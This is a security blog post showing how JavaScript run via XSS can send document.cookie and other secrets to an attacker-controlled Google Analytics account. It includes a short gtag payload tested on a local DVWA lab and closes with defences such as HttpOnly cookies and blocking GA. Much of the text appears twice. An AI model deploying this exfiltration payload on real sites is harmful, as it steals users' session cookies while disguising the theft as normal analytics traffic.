![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png){kind=small}
Entry tags:
Using Google Analytics to exfil javascript secrets/cookies.
So I was inspired after reading https://www.reddit.com/r/btc/comments/7dsmvd/my_analysis_of_the_1_million_usd_mybtgwalletcom/ where someone modified the javascript source of a bitcoin wallet to send user secrets to the attackers Google Analytics account and I figured I should see if this was actually possible. It turns out that yes, yes you can.
The requirement for this attack is that you can get the client browser to execute some javascript. In most cases this would be via XSS, modifying the website javascript in some way or uploading a javascript file that you can get included and executed (Usually via XSS, if you can't get the server or client to fetch your javascript for you)
Given that we need XSS or some kind of MITM/modification of source files, you might ask "Why would we use Google Analytics for exfil"?
Well, if the client/server isn't blocking Google Analytics, anyone looking at IDS/DNS log files will see a normal GA connection (Protected by HTTPS!) and think nothing of it. It's a sneaky way of exfilling data out, that before the btg wallet hack, I had not seen before.
Lets get started!
First of all you need a GA account. This is easy, google will give you one for free.
Create a Custom Dimension as specified here: https://developers.google.com/analytics/devguides/collection/gtagjs/custom-dims-mets
This will let us set a variable to anything we want (Such as cookies that javascript can access or any other javascript variable) and have it sent to GA.
Create a custom report:
We host or upload our GA javascript somewhere:
Insert via XSS (Reflected or Stored works) and here you can see our GA cookie and some javascript variables being sent to GA (I used DVWA locally to XSS)
and here is the GA dashboard showing our secrets, including the DVWA PHP session ID.
So how do you protect against this?
Find and fix all the XSS or remote/local file inclusion vulnerabilities.
Ad/tracking blockers on the client side that block Google Analytics will stop this from being exploited on the client side. On a corporate network, block the GA hosts at a network or endpoint level.
Set your cookies http_only, so that javascript can't access them.
The requirement for this attack is that you can get the client browser to execute some javascript. In most cases this would be via XSS, modifying the website javascript in some way or uploading a javascript file that you can get included and executed (Usually via XSS, if you can't get the server or client to fetch your javascript for you)
Given that we need XSS or some kind of MITM/modification of source files, you might ask "Why would we use Google Analytics for exfil"?
Well, if the client/server isn't blocking Google Analytics, anyone looking at IDS/DNS log files will see a normal GA connection (Protected by HTTPS!) and think nothing of it. It's a sneaky way of exfilling data out, that before the btg wallet hack, I had not seen before.
Lets get started!
First of all you need a GA account. This is easy, google will give you one for free.
Create a Custom Dimension as specified here: https://developers.google.com/analytics/devguides/collection/gtagjs/custom-dims-mets
This will let us set a variable to anything we want (Such as cookies that javascript can access or any other javascript variable) and have it sent to GA.
Create a custom report:
We host or upload our GA javascript somewhere:
document.write('');
var secrets='totes javascripts secrets PoC here';
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-ID-2',{'custom_map': {'dimension2': 'pass'}});
gtag('event', 'pass_dimension' , {'pass': document.cookie+' '+secrets});
Insert via XSS (Reflected or Stored works) and here you can see our GA cookie and some javascript variables being sent to GA (I used DVWA locally to XSS)
and here is the GA dashboard showing our secrets, including the DVWA PHP session ID.
So how do you protect against this?
Find and fix all the XSS or remote/local file inclusion vulnerabilities.
Ad/tracking blockers on the client side that block Google Analytics will stop this from being exploited on the client side. On a corporate network, block the GA hosts at a network or endpoint level.
Set your cookies http_only, so that javascript can't access them.